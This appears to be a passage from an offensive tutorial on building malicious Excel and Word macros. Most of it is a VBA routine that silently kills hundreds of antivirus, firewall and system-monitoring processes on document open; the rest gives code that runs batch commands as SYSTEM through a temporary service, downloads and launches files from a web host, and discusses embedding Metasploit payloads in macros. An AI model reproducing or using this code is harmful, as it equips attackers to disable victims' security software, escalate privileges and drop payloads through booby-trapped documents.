Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function
Call it with a simple:
Sub Workbook_Open()
Kill_AV
End Sub
Running commands as SYSTEM from VBA in Word or Excel
Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)
Set fso = CreateObject("Scripting.FileSystemObject")
Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")
Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")
systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)
For Each cmd In arrayCmds
batchRun.WriteLine (cmd)
Next cmd
systemCmd.Close
batchRun.Close
Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT
Run_Cmd "sc start systemCmd", INVISIBLE, WAIT
Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT
Kill Environ("TEMP") & "\systemCmd.vbs"
Kill Environ("TEMP") & "\systemBatch.bat"
End Function
This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.
You'd call this with something like:
Dim syscmd(1) As String
syscmd(0) = "set && pause"
syscmd(1) = "ping 127.0.0.1"
Run_Sys_Cmds syscmd, VISIBLE, WAIT
It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.
It's on my TO DO list to play with the token-kidnapping exploit for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.
VBA Function to Download Files
Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:
Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte
'You can also set a ref. to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website
oXMLHTTP.Send 'send request
'Wait for request to finish
Do While oXMLHTTP.readyState <> 4
DoEvents
Loop
oResp = oXMLHTTP.responseBody 'Returns the results as a byte array
'Create local file and save results to it
vFF = FreeFile
If Dir(vLocalFile) <> "" Then Kill vLocalFile
Open vLocalFile For Binary As #vFF
Put #vFF, , oResp
Close #vFF
'Clear memory
Set oXMLHTTP = Nothing
End Function
Here's the call that will download a copy of the Tiny Web Server to the %TEMP% directory and use the local installation of Winzip to install it:
Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
End Sub
On VBA in Excel and Word Documents...
First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will recieve an error message, "Not Enough Memory".
I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.
Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:
Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub
Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub
These would be called from within the "ThisWorkbook" tab in VBE with a function like:
Const VISIBLE = 1, INVISIBLE = 0
Const WAIT = True, NOWAIT = False
Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub
INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.